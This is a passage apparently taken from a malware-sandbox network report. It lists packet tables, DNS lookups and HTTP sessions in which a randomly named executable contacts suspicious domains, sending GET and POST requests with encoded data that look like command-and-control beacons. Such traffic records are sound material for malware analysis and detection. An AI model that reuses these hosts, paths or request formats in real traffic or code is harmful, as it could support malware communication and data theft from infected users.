Nov 25, 2024 13:57:31.629949093 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.630048037 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.630088091 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.638293028 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.638369083 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.638398886 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.646787882 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.646801949 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.646912098 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.655251026 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.655265093 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.655365944 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.663924932 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.663938999 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.663996935 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.672221899 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.672240019 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:31.672283888 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.672363043 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.675990105 CET	50033	80	192.168.2.6	217.160.0.158
Nov 25, 2024 13:57:31.795948982 CET	80	50033	217.160.0.158	192.168.2.6
Nov 25, 2024 13:57:37.529331923 CET	50034	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:37.649424076 CET	80	50034	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:37.649507999 CET	50034	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:37.663445950 CET	50034	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:37.783404112 CET	80	50034	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:38.935560942 CET	80	50034	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:38.935642958 CET	80	50034	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:38.935760021 CET	50034	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:39.169954062 CET	50034	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:40.240967035 CET	50035	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:40.362552881 CET	80	50035	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:40.364101887 CET	50035	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:40.378528118 CET	50035	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:40.499403000 CET	80	50035	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:41.718849897 CET	80	50035	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:41.719027042 CET	80	50035	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:41.719099045 CET	50035	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:41.887027025 CET	50035	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:43.031338930 CET	50036	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:43.166378975 CET	80	50036	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:43.166522980 CET	50036	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:43.291762114 CET	50036	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:43.411919117 CET	80	50036	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:43.411947012 CET	80	50036	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:44.490747929 CET	80	50036	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:44.490806103 CET	80	50036	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:44.490880013 CET	50036	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:44.809380054 CET	50036	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:45.828380108 CET	50037	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:45.948539972 CET	80	50037	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:45.948669910 CET	50037	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:45.999303102 CET	50037	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:46.121031046 CET	80	50037	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:47.239139080 CET	80	50037	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:47.239228010 CET	80	50037	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:47.239352942 CET	50037	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:47.243154049 CET	50037	80	192.168.2.6	213.249.67.10
Nov 25, 2024 13:57:47.363147020 CET	80	50037	213.249.67.10	192.168.2.6
Nov 25, 2024 13:57:53.594338894 CET	50038	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:53.715097904 CET	80	50038	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:53.715209007 CET	50038	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:53.730799913 CET	50038	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:53.851073027 CET	80	50038	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:55.031673908 CET	80	50038	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:55.031821012 CET	80	50038	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:55.031888008 CET	50038	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:55.253251076 CET	50038	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:56.266537905 CET	50039	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:56.389244080 CET	80	50039	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:56.389575958 CET	50039	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:56.402599096 CET	50039	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:56.523276091 CET	80	50039	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:57.706636906 CET	80	50039	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:57.706798077 CET	80	50039	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:57.707338095 CET	50039	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:57.907648087 CET	50039	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:58.921643972 CET	50040	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:59.041640043 CET	80	50040	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:59.041726112 CET	50040	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:59.054929972 CET	50040	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:57:59.174870014 CET	80	50040	92.118.228.160	192.168.2.6
Nov 25, 2024 13:57:59.175024033 CET	80	50040	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:00.265623093 CET	80	50040	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:00.265705109 CET	80	50040	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:00.266675949 CET	50040	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:00.559103012 CET	50040	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:01.580224037 CET	50041	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:01.700630903 CET	80	50041	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:01.700786114 CET	50041	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:01.711209059 CET	50041	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:01.831381083 CET	80	50041	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:03.036997080 CET	80	50041	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:03.037024975 CET	80	50041	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:03.037197113 CET	50041	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:03.040460110 CET	50041	80	192.168.2.6	92.118.228.160
Nov 25, 2024 13:58:03.160423040 CET	80	50041	92.118.228.160	192.168.2.6
Nov 25, 2024 13:58:08.540476084 CET	50042	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:08.660602093 CET	80	50042	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:08.660729885 CET	50042	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:08.672667980 CET	50042	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:08.792926073 CET	80	50042	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:09.805377960 CET	80	50042	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:09.805444002 CET	50042	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:10.188059092 CET	50042	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:10.308047056 CET	80	50042	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:11.203555107 CET	50043	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:11.323698044 CET	80	50043	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:11.323796988 CET	50043	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:11.337779999 CET	50043	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:11.457973957 CET	80	50043	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:12.467915058 CET	80	50043	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:12.467989922 CET	50043	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:12.844518900 CET	50043	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:12.965888977 CET	80	50043	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:13.860527039 CET	50044	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:13.980645895 CET	80	50044	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:13.980792046 CET	50044	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:13.993177891 CET	50044	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:14.113286972 CET	80	50044	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:14.113308907 CET	80	50044	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:15.123111963 CET	80	50044	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:15.123167992 CET	50044	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:15.496392965 CET	50044	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:15.616595984 CET	80	50044	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:16.517174006 CET	50045	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:16.637316942 CET	80	50045	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:16.640934944 CET	50045	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:16.648319006 CET	50045	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:16.771178007 CET	80	50045	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:17.837351084 CET	80	50045	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:17.837367058 CET	80	50045	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:17.837517977 CET	50045	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:17.840641022 CET	50045	80	192.168.2.6	3.33.130.190
Nov 25, 2024 13:58:17.960707903 CET	80	50045	3.33.130.190	192.168.2.6
Nov 25, 2024 13:58:23.417501926 CET	50047	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:23.537754059 CET	80	50047	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:23.537841082 CET	50047	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:23.553670883 CET	50047	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:23.673763990 CET	80	50047	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:24.838023901 CET	80	50047	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:24.838093042 CET	80	50047	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:24.840722084 CET	50047	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:25.060688019 CET	50047	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:26.859180927 CET	50048	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:26.979207039 CET	80	50048	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:26.979335070 CET	50048	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:26.990957022 CET	50048	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:27.110981941 CET	80	50048	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:28.248675108 CET	80	50048	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:28.248888969 CET	80	50048	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:28.248991013 CET	50048	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:28.496501923 CET	50048	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:29.515657902 CET	50049	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:29.635804892 CET	80	50049	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:29.635924101 CET	50049	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:29.647491932 CET	50049	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:29.767518044 CET	80	50049	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:29.767651081 CET	80	50049	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:31.017966032 CET	80	50049	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:31.017982960 CET	80	50049	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:31.018038988 CET	50049	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:31.152920008 CET	50049	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:32.172380924 CET	50050	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:32.464940071 CET	80	50050	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:32.465081930 CET	50050	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:32.473041058 CET	50050	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:32.593287945 CET	80	50050	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:33.808335066 CET	80	50050	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:33.808486938 CET	80	50050	209.74.64.190	192.168.2.6
Nov 25, 2024 13:58:33.808582067 CET	50050	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:33.811249018 CET	50050	80	192.168.2.6	209.74.64.190
Nov 25, 2024 13:58:33.932946920 CET	80	50050	209.74.64.190	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 13:55:59.500467062 CET	54261	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:56:00.137803078 CET	53	54261	1.1.1.1	192.168.2.6
Nov 25, 2024 13:56:27.172434092 CET	61293	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:56:27.792660952 CET	53	61293	1.1.1.1	192.168.2.6
Nov 25, 2024 13:56:42.550448895 CET	50079	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:56:43.440563917 CET	53	50079	1.1.1.1	192.168.2.6
Nov 25, 2024 13:56:57.719867945 CET	52669	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:56:57.942068100 CET	53	52669	1.1.1.1	192.168.2.6
Nov 25, 2024 13:57:06.002458096 CET	56264	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:57:06.620968103 CET	53	56264	1.1.1.1	192.168.2.6
Nov 25, 2024 13:57:21.016424894 CET	51480	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:57:21.903486013 CET	53	51480	1.1.1.1	192.168.2.6
Nov 25, 2024 13:57:36.776742935 CET	58235	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:57:37.525696993 CET	53	58235	1.1.1.1	192.168.2.6
Nov 25, 2024 13:57:52.252027035 CET	49516	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:57:53.246684074 CET	49516	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:57:53.591197968 CET	53	49516	1.1.1.1	192.168.2.6
Nov 25, 2024 13:57:53.591217995 CET	53	49516	1.1.1.1	192.168.2.6
Nov 25, 2024 13:58:08.047487974 CET	60390	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:58:08.537590981 CET	53	60390	1.1.1.1	192.168.2.6
Nov 25, 2024 13:58:22.859663963 CET	50041	53	192.168.2.6	1.1.1.1
Nov 25, 2024 13:58:23.403625965 CET	53	50041	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 13:55:59.500467062 CET	192.168.2.6	1.1.1.1	0x4be8	Standard query (0)	www.iwhfa.fyi	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:27.172434092 CET	192.168.2.6	1.1.1.1	0x8652	Standard query (0)	www.nieuws-july202502.sbs	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:42.550448895 CET	192.168.2.6	1.1.1.1	0xf10b	Standard query (0)	www.wiretap.digital	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:57.719867945 CET	192.168.2.6	1.1.1.1	0x323a	Standard query (0)	www.o30cf998d.cfd	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:06.002458096 CET	192.168.2.6	1.1.1.1	0xa0e4	Standard query (0)	www.impulsarnegocios.info	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:21.016424894 CET	192.168.2.6	1.1.1.1	0xe772	Standard query (0)	www.accupower.tech	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:36.776742935 CET	192.168.2.6	1.1.1.1	0x6012	Standard query (0)	www.tanjavanlaar.online	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:52.252027035 CET	192.168.2.6	1.1.1.1	0x82a8	Standard query (0)	www.kuaimaolife.shop	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:53.246684074 CET	192.168.2.6	1.1.1.1	0x82a8	Standard query (0)	www.kuaimaolife.shop	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:58:08.047487974 CET	192.168.2.6	1.1.1.1	0x8cb3	Standard query (0)	www.funddata-x.net	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:58:22.859663963 CET	192.168.2.6	1.1.1.1	0x4eb1	Standard query (0)	www.hellogus.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 13:54:14.059218884 CET	1.1.1.1	192.168.2.6	0xa863	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 13:54:14.059218884 CET	1.1.1.1	192.168.2.6	0xa863	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:00.137803078 CET	1.1.1.1	192.168.2.6	0x4be8	No error (0)	www.iwhfa.fyi		168.206.11.225	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:27.792660952 CET	1.1.1.1	192.168.2.6	0x8652	No error (0)	www.nieuws-july202502.sbs	nieuws-july202502.sbs		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 13:56:27.792660952 CET	1.1.1.1	192.168.2.6	0x8652	No error (0)	nieuws-july202502.sbs		162.0.229.222	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:43.440563917 CET	1.1.1.1	192.168.2.6	0xf10b	No error (0)	www.wiretap.digital	wiretap.digital		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 13:56:43.440563917 CET	1.1.1.1	192.168.2.6	0xf10b	No error (0)	wiretap.digital		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:43.440563917 CET	1.1.1.1	192.168.2.6	0xf10b	No error (0)	wiretap.digital		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:56:57.942068100 CET	1.1.1.1	192.168.2.6	0x323a	Name error (3)	www.o30cf998d.cfd	none	none	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:06.620968103 CET	1.1.1.1	192.168.2.6	0xa0e4	No error (0)	www.impulsarnegocios.info	impulsarnegocios.info		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 13:57:06.620968103 CET	1.1.1.1	192.168.2.6	0xa0e4	No error (0)	impulsarnegocios.info		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:06.620968103 CET	1.1.1.1	192.168.2.6	0xa0e4	No error (0)	impulsarnegocios.info		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:21.903486013 CET	1.1.1.1	192.168.2.6	0xe772	No error (0)	www.accupower.tech	accupower.tech		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 13:57:21.903486013 CET	1.1.1.1	192.168.2.6	0xe772	No error (0)	accupower.tech		217.160.0.158	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:37.525696993 CET	1.1.1.1	192.168.2.6	0x6012	No error (0)	www.tanjavanlaar.online		213.249.67.10	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:53.591197968 CET	1.1.1.1	192.168.2.6	0x82a8	No error (0)	www.kuaimaolife.shop		92.118.228.160	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:57:53.591217995 CET	1.1.1.1	192.168.2.6	0x82a8	No error (0)	www.kuaimaolife.shop		92.118.228.160	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:58:08.537590981 CET	1.1.1.1	192.168.2.6	0x8cb3	No error (0)	www.funddata-x.net	funddata-x.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 13:58:08.537590981 CET	1.1.1.1	192.168.2.6	0x8cb3	No error (0)	funddata-x.net		3.33.130.190	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:58:08.537590981 CET	1.1.1.1	192.168.2.6	0x8cb3	No error (0)	funddata-x.net		15.197.148.33	A (IP address)	IN (0x0001)	false
Nov 25, 2024 13:58:23.403625965 CET	1.1.1.1	192.168.2.6	0x4eb1	No error (0)	www.hellogus.online		209.74.64.190	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.iwhfa.fyi

www.nieuws-july202502.sbs

www.wiretap.digital

www.impulsarnegocios.info

www.accupower.tech

www.tanjavanlaar.online

www.kuaimaolife.shop

www.funddata-x.net

www.hellogus.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49947	168.206.11.225	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:00.273483992 CET	522	OUT	GET /fi6o/?0dfXG=hGALt7t5gSxqIzGlUS2XPVJcZRq8G4bpVz89Igngf/M66ae3aRT9B4yDBGrb5mJVJyE8wpLrmF7Ln1eyeL70u5A2xvjbG9IBG0pL8zTYHC2rbtbDMuSlaq2pAvIKqKWvpuiBTOk=&U0W=7ROlj HTTP/1.1 Host: www.iwhfa.fyi Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	50004	162.0.229.222	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:56:27.932960987 CET	810	OUT	POST /vt2q/ HTTP/1.1 Host: www.nieuws-july202502.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.nieuws-july202502.sbs Referer: http://www.nieuws-july202502.sbs/vt2q/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 41 63 41 32 30 73 45 39 45 7a 77 37 34 52 77 2f 6f 58 75 52 70 36 4a 79 55 65 56 68 39 58 77 52 45 4f 51 6f 65 70 39 74 79 70 48 6e 6e 48 79 45 54 77 50 46 6e 46 71 48 44 55 42 4d 37 62 71 75 69 41 57 48 74 48 55 35 6e 38 51 38 50 34 69 50 64 56 6f 78 52 65 41 33 37 65 70 76 62 72 64 34 4e 59 33 79 4a 42 41 30 61 43 7a 48 79 32 6f 54 61 48 69 67 53 55 4a 4f 4c 76 44 71 4f 4b 75 46 44 56 68 63 34 42 73 49 51 43 33 44 58 6c 7a 47 47 44 72 2f 6d 30 30 4e 4c 71 64 78 43 39 47 7a 41 68 56 58 48 58 41 58 70 44 55 4e 43 70 46 33 64 54 6f 67 61 34 38 42 6a 54 74 5a 61 59 52 64 68 65 39 7a 76 46 6c 4e 4c 7a 70 4e Data Ascii: 0dfXG=AcA20sE9Ezw74Rw/oXuRp6JyUeVh9XwREOQoep9typHnnHyETwPFnFqHDUBM7bquiAWHtHU5n8Q8P4iPdVoxReA37epvbrd4NY3yJBA0aCzHy2oTaHigSUJOLvDqOKuFDVhc4BsIQC3DXlzGGDr/m00NLqdxC9GzAhVXHXAXpDUNCpF3dToga48BjTtZaYRdhe9zvFlNLzpN
Nov 25, 2024 13:56:29.262661934 CET	1236	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 content-type: text/html transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 25 Nov 2024 12:56:29 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close Data Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED] Data Ascii: 1352ZJvLg!qCV's=pB<w?Kfm( o=\|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s^o/^VL?{fUm7n/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,Dyl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=nKo:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P\|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug\|J
